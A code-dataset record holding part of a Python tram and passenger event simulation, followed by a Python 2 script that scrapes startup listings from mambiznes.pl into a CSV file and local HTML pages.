        # update the current loading and leaving time of the tram
        loading_time = request.load(tram, stop)
        leaving_time = tram.compute_leaving_time(now, loading_time=loading_time)
        # update the log of the tram
        updates.add(tram)
        # Did the leaving time change?
        if leaving_time:
            # -> Create a new event for leaving the stop
            create_event(leaving_time, 4, [tram.index])


def passenger_update(stop_id, recent_tram_arrival=False, consider_tram=False):
    """
    Event no. 6: New passengers arrive and/or alight and board a vehicle

    :param stop_id: Index of the stop
    :type stop_id: int
    :param recent_tram_arrival: New arrival of a tram (True) or update while the tram is waiting (False)?, defaults to False
    :type recent_tram_arrival: bool, optional
    :param consider_tram: Consider the boarding and alighting process (True) or only arrivals (False), defaults to False
    :type consider_tram: bool, optional
    :return: boarding and alighting time
    :rtype: tuple
    """
    global now, updates
    stop = stops[stop_id]
    if consider_tram:
        tram_id = stop.current_tram
    else:
        tram_id = -1
    # Update arriving passengers
    Passengers.arrival(now, stop)
    boarding_time = 0
    alighting_time = 0
    # if currently a tram waits at the platform
    if tram_id >= 0:
        tram = trams[tram_id]
        if recent_tram_arrival or tram.leaving_time != now:
            if recent_tram_arrival:
                # compute number and time for alighting passengers
                alighting_passengers, alighting_time = Passengers.alighting(stop, tram, now)
            # compute number and time for boarding passengers
            boarding_passengers, boarding_time = Passengers.boarding(stop, tram, now)
            if recent_tram_arrival:
                # compute number and time for changing passengers
                changing_passengers = Passengers.changing(stop, alighting_passengers, now)
            # Update leaving time
            if not recent_tram_arrival:
                leaving_time = tram.compute_leaving_time(now, boarding_time, alighting_time, 0, 0)
                updates.add(tram)
                #write_entities_log(tram,now)
                # Did the leaving time change?
                if leaving_time:
                    create_event(leaving_time, 4, [tram_id])
            #next_arrival = Passengers.compute_next_arrival_time(now,stop,tram)
            #if next_arrival:
                # create new event (for passengers that may arrive before the current tram leaves)
                #create_event(next_arrival, 6, [stop_id])
    updates.add(stop)
    updates.add("passenger")
    return boarding_time, alighting_time
| 29.100418 | 134 | 0.600096 | 2,450 | 20,865 | 4.923673 | 0.127755 | 0.017243 | 0.02089 | 0.004559 | 0.301832 | 0.247617 | 0.211556 | 0.174335 | 0.164221 | 0.151455 | 0 | 0.005979 | 0.302612 | 20,865 | 717 | 135 | 29.100418 | 0.823036 | 0.231201 | 0 | 0.274096 | 0 | 0 | 0.038044 | 0.022732 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039157 | false | 0.150602 | 0.03012 | 0 | 0.078313 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
9fccdafbf659c38a1a762c6f3bc28239cbcc246f | 3,175 | py | Python | parser.py | bitounu/startupy | 490a48a5e83900d91c5a2a67bb7fd286112f49f4 | [
"Unlicense"
] | null | null | null | parser.py | bitounu/startupy | 490a48a5e83900d91c5a2a67bb7fd286112f49f4 | [
"Unlicense"
] | null | null | null | parser.py | bitounu/startupy | 490a48a5e83900d91c5a2a67bb7fd286112f49f4 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python
# -*- coding: UTF-8 -*-

# Python dependencies: BeautifulSoup
# install from a package
# Debian/Ubuntu: apt-get install python-bs4
# or
# easy_install beautifulsoup4
# or
# pip install beautifulsoup4

# The script builds an index of companies from the mambiznes.pl pages
# and emits CSV:
# Columns:
# fid
# nazwa - company name
# url - url of the page on mambiznes.pl
# opis - short description
# full - link to the local file with the full description
# ourl - url of the company's original page
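# An illustrative output row (all values invented for the example):
# "1","Example Startup","https://mambiznes.pl/startupy/example","Short pitch","1.html",""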

import sys
import urllib2
import random
from time import sleep

from bs4 import BeautifulSoup
from bs4 import SoupStrainer

# company identifier
fid = 0

# how many pages the index on mambiznes.pl has (has to be checked manually)
# today (18.09.2017) it is 53
ILE_STRON = 53
# file with the company index
CSV_FILE = "startupy.csv"
# parameter for sleep() to fool firewalls
MNOZNIK = 10

# header of every file with a full company description
html_header = """
<!DOCTYPE html>
<html lang="pl-PL">
<head>
<meta charset="UTF-8">
<link rel="stylesheet" href="mambiznes.css" type="text/css">
"""
html_footer = """
</body>
</html>
"""

# narrow the search on the index pages to the "main" div
only_main = SoupStrainer("main")
# narrow the search on a company page to the div with this class
only_opis = SoupStrainer("div", class_="post-desc np")

# for testing on a local file
#plik = open('test.html', 'r').read()
#artin = (BeautifulSoup(plik, "html.parser", parse_only=only_main))


# emit CSV
def skanuj(artin):
    global fid
    linia = ""
    for x in artin.find_all("div", class_="article-bottom"):
        fid += 1
        sys.stdout.write('.')
        sys.stdout.flush()
        opis_file = str(fid) + ".html"
        url = x.find('a', class_='dib title').get('href')
        nazwa = x.find('a', class_='dib title').contents[0]
        linia += \
            '"' + \
            str(fid) + \
            '","' + \
            nazwa + \
            '","' + \
            url + \
            '","' + \
            x.find('p', class_="excerpt").contents[0] + \
            '","' + \
            opis_file + \
            '",""' + \
            "\n"
        # the full company description has to be fetched
        # delay to fool a possible proxy
        sleep(random.random() * MNOZNIK / 1.3)
        opis_url = urllib2.urlopen(url)
        opis = (BeautifulSoup(opis_url, "html.parser", parse_only=only_opis))
        plout = open(opis_file, 'w')
        txtout = html_header + "<title>" + nazwa.encode('utf-8') + "</title>\n</head>\n\n<body>" + str(opis) + html_footer
        plout.write(str(txtout))
        plout.close()
    return linia.encode('utf-8')


# fetch the data from the portal
print "Fetching page:"
out = "fid,nazwa,url,opis,full,ourl\n"
for i in range(1, ILE_STRON + 1):
    sys.stdout.write(str(i))
    sys.stdout.flush()
    weburl = "https://mambiznes.pl/startupy/page/" + str(i)
    data = urllib2.urlopen(weburl)
    artin = (BeautifulSoup(data, "html.parser", parse_only=only_main))
    out += skanuj(artin)
sys.stdout.write('done\n')
sys.stdout.flush()
#print out

# write it to a file to keep a copy
fout = open(CSV_FILE, 'w')
fout.write(out)
fout.close()
| 28.097345 | 122 | 0.610079 | 418 | 3,175 | 4.566986 | 0.433014 | 0.028287 | 0.023573 | 0.029859 | 0.060241 | 0.048193 | 0 | 0 | 0 | 0 | 0 | 0.014173 | 0.244409 | 3,175 | 112 | 123 | 28.348214 | 0.781576 | 0.328819 | 0 | 0.132353 | 0 | 0 | 0.197042 | 0.027195 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.088235 | null | null | 0.014706 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |